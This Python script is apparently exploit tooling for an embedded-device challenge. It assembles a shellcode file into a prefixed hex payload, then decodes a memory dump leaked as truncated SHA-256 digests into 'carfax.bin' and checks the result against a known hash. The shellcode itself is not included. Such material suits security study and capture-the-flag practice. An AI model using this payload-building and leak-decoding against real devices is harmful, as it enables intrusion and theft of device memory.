#!/usr/bin/env python
import re, os, sys
from hashlib import sha256
# This program uses an extended version of Swiftloke's brilliant MSProbe to assemble the payload
from MSProbe.assemble import asmMain
# Number of leading hex digits of each SHA-256 digest that are compared.
# The original note says this "must be corroborated within the script";
# presumably the assembly source has to use the same value -- confirm.
depth = 6
# Size, in bytes, of each hashed message.
message_size = 1

# Assembly source: the first command-line argument when one is given,
# otherwise the default file name.
shellcode_asm = sys.argv[1] if len(sys.argv) > 1 else 'shellcode.asm'
# MSProbe writes its result next to the source, under a ".tmp" suffix.
shellcode_out = f'{shellcode_asm}.tmp'

# Assemble the source with MSProbe.
asmMain(shellcode_asm, shellcode_out, silent=True)

# Only the first line of the assembler output is used; the temporary file
# is deleted as soon as it has been read.
# NOTE(review): readline() keeps a trailing newline if the file has one, and
# that newline is then printed as part of the payload below.
with open(shellcode_out) as file:
    shellcode = file.readline()
os.remove(shellcode_out)

# Byte length of the assembled code (bytes.fromhex ignores whitespace).
shellcode_len = len(bytes.fromhex(shellcode))

# Emit the literal prefix "6000", the length in hex (not zero-padded) and
# the assembled hex string, all on one line.
print(f"6000{shellcode_len:x}{shellcode}")
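def main():
    """Decode a digest-encoded SRAM dump and check it against a known hash.

    Prompts for the expected SHA-256 of the SRAM image and for the encoded
    dump, in which every ``depth`` hex digits are the truncated SHA-256 of
    one ``message_size``-byte message. The recovered bytes are printed as
    hex, written to ``carfax.bin`` and hexdumped with ``xxd``. The buffer is
    then zero-padded to 0x1000 bytes, hashed, and compared with the
    expected value.
    """
    # Remove all whitespace from both inputs, so a pasted hash with a stray
    # space or carriage return no longer produces a false mismatch.
    internal_sram_hash = re.sub(r'\s+', '', input("Internal SRAM Hash: ")).lower()
    target = re.sub(r'\s+', '', input("\nEncoded Target: ")).lower()

    # Lookup table: truncated digest -> message value.
    # NOTE(review): if two messages share the same truncated digest, the
    # later one silently replaces the earlier one.
    all_hashes = {}
    for i in range(1 << (8 * message_size)):
        message = i.to_bytes(length=message_size, byteorder='big', signed=False)
        all_hashes[sha256(message).hexdigest()[:depth]] = i

    sram = bytearray()
    unresolved = 0

    print("Decoded:")
    # NOTE(review): the step (depth * message_size) and the key width (depth)
    # agree only while message_size == 1, and bytearray.append() accepts only
    # values below 256 -- both need revisiting if message_size changes.
    for loc in range(0, len(target), depth * message_size):
        key = target[loc:loc + depth]
        try:
            value = all_hashes[key]
        except KeyError:
            # Unknown or truncated chunk: keep the zero placeholder, but
            # count it so the substitution is reported below.
            value = 0x00
            unresolved += 1
        else:
            print(f"{value:02x}", end="")
        sram.append(value)

    # The file holds the decoded bytes as-is; padding is applied afterwards,
    # for the hash only.
    with open("carfax.bin", 'wb') as output:
        output.write(sram)

    print("")
    if unresolved:
        # Reported on stderr so the stdout format stays unchanged.
        print(
            f"warning: {unresolved} chunk(s) had no table entry and were stored as 0x00",
            file=sys.stderr,
        )

    # Flush before spawning xxd, so our buffered output cannot end up after
    # the hexdump when stdout is a pipe or a file.
    sys.stdout.flush()
    os.system("xxd carfax.bin")

    # Zero-pad to 0x1000 bytes before hashing; longer input is left alone.
    if len(sram) < 0x1000:
        sram.extend(bytes(0x1000 - len(sram)))

    decoded_hash = sha256(sram).hexdigest()
    print(f"\nHash:\nProvided: {internal_sram_hash}\n Decoded: {decoded_hash}")

    # Both sides are lower-case hex at this point.
    if decoded_hash == internal_sram_hash:
        print("Hash match!")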
# Start the interactive decoder only when this file is executed as a script,
# not when it is imported.
if __name__ == "__main__":
    main()